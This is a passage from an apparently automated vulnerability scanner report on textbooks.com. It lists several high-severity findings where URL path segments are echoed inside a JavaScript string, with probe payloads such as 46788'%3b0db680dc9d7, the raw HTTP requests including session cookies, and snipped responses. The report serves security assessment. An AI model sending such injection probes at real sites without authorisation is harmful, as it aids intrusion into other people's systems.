TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:27:59 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js78723';aff6123c54d/jquery-1.3.2.js'

</script>
...[SNIP]...

1.82. https://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46788'%3b0db680dc9d7 was submitted in the REST URL parameter 2. This input was echoed as 46788';0db680dc9d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/jquery-1.3.2.js46788'%3b0db680dc9d7 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:00 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/jquery-1.3.2.js46788';0db680dc9d7'

</script>
...[SNIP]...

1.83. https://www.textbooks.com/js/main.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1095'%3ba7cd64d56d2 was submitted in the REST URL parameter 1. This input was echoed as d1095';a7cd64d56d2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsd1095'%3ba7cd64d56d2/main.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:27:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsd1095';a7cd64d56d2/main.js'

</script>
...[SNIP]...

1.84. https://www.textbooks.com/js/main.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f2bd'%3b2d9b5e25c8f was submitted in the REST URL parameter 2. This input was echoed as 9f2bd';2d9b5e25c8f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/main.js9f2bd'%3b2d9b5e25c8f HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:27:59 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/main.js9f2bd';2d9b5e25c8f'

</script>
...[SNIP]...

1.85. https://www.textbooks.com/js/php.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/php.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9857c'%3bee018a7187 was submitted in the REST URL parameter 1. This input was echoed as 9857c';ee018a7187 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js9857c'%3bee018a7187/php.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3624
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:03 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js9857c';ee018a7187/php.js'

</script>
...[SNIP]...

1.86. https://www.textbooks.com/js/php.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/php.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5032c'%3be9abaae6140 was submitted in the REST URL parameter 2. This input was echoed as 5032c';e9abaae6140 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/php.js5032c'%3be9abaae6140 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:04 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
Reset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/php.js5032c';e9abaae6140'

</script>
...[SNIP]...

1.87. https://www.textbooks.com/js/s_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dd3c'%3b05d551d3562 was submitted in the REST URL parameter 1. This input was echoed as 7dd3c';05d551d3562 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js7dd3c'%3b05d551d3562/s_code.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h